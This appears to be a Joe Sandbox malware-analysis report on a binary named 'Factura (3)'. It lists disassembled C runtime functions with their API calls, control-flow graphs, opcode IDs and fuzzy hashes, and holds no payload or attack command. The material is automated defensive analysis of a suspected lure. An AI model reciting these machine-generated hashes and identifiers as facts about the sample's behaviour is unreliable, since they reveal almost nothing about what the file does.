                                                      control_flow_graph 356 7ff734100acc-7ff734100aff call 7ff734100428 359 7ff734100b05-7ff734100b12 356->359 360 7ff734100d59-7ff734100d5c call 7ff7341004a8 356->360 362 7ff734100b15-7ff734100b17 359->362 363 7ff734100d61 360->363 364 7ff734100c63-7ff734100c91 call 7ff73410a0b0 362->364 365 7ff734100b1d-7ff734100b28 362->365 366 7ff734100d63-7ff734100d88 call 7ff7340e7a40 363->366 374 7ff734100c94-7ff734100c9a 364->374 365->362 368 7ff734100b2a-7ff734100b30 365->368 371 7ff734100b36-7ff734100b41 IsValidCodePage 368->371 372 7ff734100c5b-7ff734100c5e 368->372 371->372 375 7ff734100b47-7ff734100b4e 371->375 372->366 376 7ff734100c9c-7ff734100c9f 374->376 377 7ff734100cda-7ff734100ce4 374->377 378 7ff734100b76-7ff734100b85 GetCPInfo 375->378 379 7ff734100b50-7ff734100b5e 375->379 376->377 383 7ff734100ca1-7ff734100cac 376->383 377->374 382 7ff734100ce6-7ff734100cf2 377->382 380 7ff734100c4f-7ff734100c55 378->380 381 7ff734100b8b-7ff734100bab call 7ff73410a0b0 378->381 384 7ff734100b62-7ff734100b71 379->384 380->360 380->372 399 7ff734100c45 381->399 400 7ff734100bb1-7ff734100bba 381->400 386 7ff734100cf4-7ff734100cf7 382->386 387 7ff734100d1d 382->387 388 7ff734100cd2-7ff734100cd8 383->388 389 7ff734100cae 383->389 390 7ff734100d4f-7ff734100d52 call 7ff734100540 384->390 393 7ff734100d14-7ff734100d1b 386->393 394 7ff734100cf9-7ff734100cfc 386->394 395 7ff734100d24-7ff734100d37 387->395 388->376 388->377 391 7ff734100cb2-7ff734100cb9 389->391 397 7ff734100d57 390->397 391->388 398 7ff734100cbb-7ff734100cd0 391->398 393->395 401 7ff734100cfe-7ff734100d00 394->401 402 7ff734100d0b-7ff734100d12 394->402 403 7ff734100d3c-7ff734100d4d 395->403 397->363 398->388 398->391 406 7ff734100c47-7ff734100c4a 399->406 404 7ff734100bbc-7ff734100bbf 400->404 405 7ff734100be8-7ff734100bec 400->405 401->395 407 7ff734100d02-7ff734100d09 401->407 402->395 403->390 403->403 404->405 408 7ff734100bc1-7ff734100bca 404->408 409 7ff734100bf1-7ff734100bfa 405->409 406->384 407->395 410 7ff734100be0-7ff734100be6 408->410 411 7ff734100bcc-7ff734100bd1 408->411 409->409 412 7ff734100bfc-7ff734100c05 409->412 410->404 410->405 413 7ff734100bd4-7ff734100bde 411->413 414 7ff734100c35 412->414 415 7ff734100c07-7ff734100c0a 412->415 413->410 413->413 416 7ff734100c3c-7ff734100c43 414->416 417 7ff734100c2c-7ff734100c33 415->417 418 7ff734100c0c-7ff734100c0f 415->418 416->406 417->416 419 7ff734100c23-7ff734100c2a 418->419 420 7ff734100c11-7ff734100c13 418->420 419->416 421 7ff734100c15-7ff734100c18 420->421 422 7ff734100c1a-7ff734100c21 420->422 421->416 422->416
                                                      APIs
                                                        • Part of subcall function 00007FF734100428: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF734100764), ref: 00007FF734100452
                                                      • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,00000000,00007FF734100895), ref: 00007FF734100B39
                                                      • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,00000000,00007FF734100895), ref: 00007FF734100B7D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: aaaa9abd8e278295d9640a6c5dd9acf2b596e7c1232e680b79df1a6f9e04eaf7
                                                      • Instruction ID: 64fff4a116e6c40432e1c2fc3a935be87c8c274ac8bdd7babf0fb4b1eccc6788
                                                      • Opcode Fuzzy Hash: aaaa9abd8e278295d9640a6c5dd9acf2b596e7c1232e680b79df1a6f9e04eaf7
                                                      • Instruction Fuzzy Hash: 5281F862A0DE8262E76CAF17B4C8179FBA1EB44740FE84035C64D87691DE3DF541E322
                                                      Function 00007FF7340E7B70 Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: __scrt_acquire_startup_lock__scrt_release_startup_lock
                                                      • String ID:
                                                      • API String ID: 3055961719-0
                                                      • Opcode ID: c50e6158f62ff9f6ac30a2827272fbd418e74a549cd29a9f3f65d07e7d535c3e
                                                      • Instruction ID: 2f2e62498acccd4b57013900c7ed4126e7297add7cce56b0cbbca749435b1244
                                                      • Opcode Fuzzy Hash: c50e6158f62ff9f6ac30a2827272fbd418e74a549cd29a9f3f65d07e7d535c3e
                                                      • Instruction Fuzzy Hash: 9831A211B1DA4B61FA1CBF2794D13B9E290AF85744FC440B8EA0DC72D3DE2CA495E635
                                                      Function 00007FF7340F8D4C Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: FileHandleType
                                                      • String ID:
                                                      • API String ID: 3000768030-0
                                                      • Opcode ID: 8cea16ebbd8e8f1e046f15cb459bd5c104da91dfe81497d9640ccb44d3a8aa50
                                                      • Instruction ID: ddb60052b938933a43ac53d68f4fdbdc6253e6ed59a278c107229d74988700af
                                                      • Opcode Fuzzy Hash: 8cea16ebbd8e8f1e046f15cb459bd5c104da91dfe81497d9640ccb44d3a8aa50
                                                      • Instruction Fuzzy Hash: 7E319622B19B46A1D7289F1694D41B8B790FB45BA0BA81375D75E873E0CF38E461E310
                                                      Function 00007FF7340F90CC Relevance: 3.1, APIs: 2, Instructions: 59COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                      • String ID:
                                                      • API String ID: 1687624791-0
                                                      • Opcode ID: f8434339c19f2d8af26b20d235332346ca5eeaaf1a141028fab64d603f10938a
                                                      • Instruction ID: e07405e0d237cebf93dcb2268959a67997325b274c89c8ceb4f7a41edc734956
                                                      • Opcode Fuzzy Hash: f8434339c19f2d8af26b20d235332346ca5eeaaf1a141028fab64d603f10938a
                                                      • Instruction Fuzzy Hash: 4521D420F09A8260EA9C7F23B4C82B892D16F847A4F984275DA5DC73D6DE6CA444A721
                                                      Function 00007FF7340E7A8C Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                      • String ID:
                                                      • API String ID: 3548387204-0
                                                      • Opcode ID: f51f0ab422852233123e64330f26f29acff0743bc7bf2c9003033929a7e2be9e
                                                      • Instruction ID: 371ede4a527463f0b4a1988a8dfa6ceae594d7c453dc4a147258605057ccf9f8
                                                      • Opcode Fuzzy Hash: f51f0ab422852233123e64330f26f29acff0743bc7bf2c9003033929a7e2be9e
                                                      • Instruction Fuzzy Hash: 78118D51F0D94B65FA9C7FB255D22B8A1828F94314FC004B4EA1DC71D3ED1DB8E1A2BA
                                                      Function 00007FF7340E7648 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                      • String ID:
                                                      • API String ID: 1173176844-0
                                                      • Opcode ID: f191a0376925299139c7c8e1ffc9a3835da450373a9bb438b96ab324ffb1957f
                                                      • Instruction ID: d3727f643cb6c60e49e47e641f311b187d343e4f87ec299c7d9dd2447ab8f0b7
                                                      • Opcode Fuzzy Hash: f191a0376925299139c7c8e1ffc9a3835da450373a9bb438b96ab324ffb1957f
                                                      • Instruction Fuzzy Hash: 65E0EC10F4A90FA5FD6C3AB714D607491800F597B8ED81BB0DD7D862D3AD1CA4E5A138
                                                      Function 00007FF7340F450D Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                      • String ID:
                                                      • API String ID: 3947729631-0
                                                      • Opcode ID: c4077998ab788d16ef59c5c367e1fb227c4ba129c7e49a8aabc496dc11d071e4
                                                      • Instruction ID: f4a153f51f3e898ce9d441ef7380259504887f566949313d99847e670085ad04
                                                      • Opcode Fuzzy Hash: c4077998ab788d16ef59c5c367e1fb227c4ba129c7e49a8aabc496dc11d071e4
                                                      • Instruction Fuzzy Hash: E3219F32F0A60199EB29BF65C4C02AC73E4EB54718F840635DA1C86ADADF78E485DB90
                                                      Function 00007FF734106748 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 03050a372492c2843a2563fceab3d08d7bdef971b1626472b96fc408fbfb45d5
                                                      • Instruction ID: ed1adf0c721468e376dc3afb7aa648755186069f540ef6e7ab9a203a44eca87d
                                                      • Opcode Fuzzy Hash: 03050a372492c2843a2563fceab3d08d7bdef971b1626472b96fc408fbfb45d5
                                                      • Instruction Fuzzy Hash: EA21D732618E8197D769AF2AE484379B2A0FB84B54FA40234E75DC76E5DF3CD4009B10
                                                      Function 00007FF7340F35F4 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: 1b8bd8de029ed5c5eb4174303f7482559074fbfbe1bcddd89a7628224b0da41d
                                                      • Instruction ID: 577e7cd28354f5ea7fd79e31adb5acfc560e92382899c66a66fcb9dff78c048b
                                                      • Opcode Fuzzy Hash: 1b8bd8de029ed5c5eb4174303f7482559074fbfbe1bcddd89a7628224b0da41d
                                                      • Instruction Fuzzy Hash: 3D115161B1E54561FB69BE2694C137DE2E06FC5F94FC44471E64C87685DE3CF400A760
                                                      Function 00007FF734101774 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-0
                                                      • Opcode ID: cae6f325fd7fcc50b96b5f208626907bb23a38f38712788b05fa19d10d49450d
                                                      • Instruction ID: d7883309226e41d9547ea186290a7a3e352306cc417a5535dfdcaaef25ead1ed
                                                      • Opcode Fuzzy Hash: cae6f325fd7fcc50b96b5f208626907bb23a38f38712788b05fa19d10d49450d
                                                      • Instruction Fuzzy Hash: C4119D32A0DE42A2F258BF16B4C4529F2A0FB84740FA50439E64DC7692DF3DF810A761
                                                      Function 00007FF7340F8064 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7340F7EDE,?,?,?,00007FF7340F3521,?,?,?,?,00007FF7340F8110), ref: 00007FF7340F80B9
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 8e06954e6e8dbaba86b721d93c4a71a5ea01011d042445d106ead9e3c12ca028
                                                      • Instruction ID: 96ebc2c7ba73f98bc685b61668832a6c3e3cfc725352617cdd814c6c6a769428
                                                      • Opcode Fuzzy Hash: 8e06954e6e8dbaba86b721d93c4a71a5ea01011d042445d106ead9e3c12ca028
                                                      • Instruction Fuzzy Hash: 35F03C12B0A60361FEAD7E6399D12F592D15F85B40FDC0474DD0ED62C2EE2CE4956230
                                                      Function 00007FF7340DCEA0 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF7340DCEBD
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWork
                                                      • String ID:
                                                      • API String ID: 1865873047-0
                                                      • Opcode ID: d914cf776b96de9b98feaae32b6e564d64c7a8cde1b65f2702afddc604c924e4
                                                      • Instruction ID: c3dd6afb8c5c3f3e9b2f9fa2bf0f2b006efeb7cf0cc59666ba127ab18bfc6238
                                                      • Opcode Fuzzy Hash: d914cf776b96de9b98feaae32b6e564d64c7a8cde1b65f2702afddc604c924e4
                                                      • Instruction Fuzzy Hash: 39018376618B8496CB14DF1AE49121EBBB0F7CAB84F608016EB8D83B28CF39C411DB40
                                                      Function 00007FF7340FB8F0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF7340FF0A1,?,?,00000000,00007FF7341013CB,?,?,?,00007FF7340F4FBB,?,?,?,00007FF7340F4EB1), ref: 00007FF7340FB92E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: e514982059f1fa9492a96c3cfea9b3ce75aa110579a1375bd9f9fc5d93be99d7
                                                      • Instruction ID: ede8b386cf6fc72bd3dfd85c7d264b623ad8e7cc936bea6ab59b40b004560e96
                                                      • Opcode Fuzzy Hash: e514982059f1fa9492a96c3cfea9b3ce75aa110579a1375bd9f9fc5d93be99d7
                                                      • Instruction Fuzzy Hash: 40F03A20B0E60261FA5C7E6368C127591E44F847A0FC80674DD2EC66C2DE2CA4416930

                                                      Non-executed Functions

                                                      Function 00007FF734104A20 Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 808467561-2761157908
                                                      • Opcode ID: b8f88e77bf86cd5cf8af23ee13b5b8257ac003fbe6fe179f76972a90c00f6e38
                                                      • Instruction ID: e5a4c41177045d5589700a76bbdda8c168f89960ed8cfdac018a1b632e4a51d3
                                                      • Opcode Fuzzy Hash: b8f88e77bf86cd5cf8af23ee13b5b8257ac003fbe6fe179f76972a90c00f6e38
                                                      • Instruction Fuzzy Hash: A1B22BB2B186829BE768DF66E4C47FCB7A1FB44344FA01135DA0D97A88DB38E500DB51
                                                      Function 00007FF734103768 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                      • String ID: utf8
                                                      • API String ID: 3069159798-905460609
                                                      • Opcode ID: 63c218e870ce9e5827764f2c582c237b672c81bd98d5f830c00385115f4cde0f
                                                      • Instruction ID: ff3089d2638c77348cefab5fcb6cf0086268a1e4c021b5e9b8b15835bc404c66
                                                      • Opcode Fuzzy Hash: 63c218e870ce9e5827764f2c582c237b672c81bd98d5f830c00385115f4cde0f
                                                      • Instruction Fuzzy Hash: 7591A232A08B46A1EB28BF13E4852B9A3A4FF44B80FA44131DE5D87795DF3CE551D322
                                                      Function 00007FF7341041B0 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                      • String ID:
                                                      • API String ID: 2591520935-0
                                                      • Opcode ID: 69808a05b0caeab0b96025c272432f026a3349d38e8bbeff7f8501d8e5bf737d
                                                      • Instruction ID: e25ceb6616f386cbb4b8f6bb76152786989dfc552d462f707da8aff09a761760
                                                      • Opcode Fuzzy Hash: 69808a05b0caeab0b96025c272432f026a3349d38e8bbeff7f8501d8e5bf737d
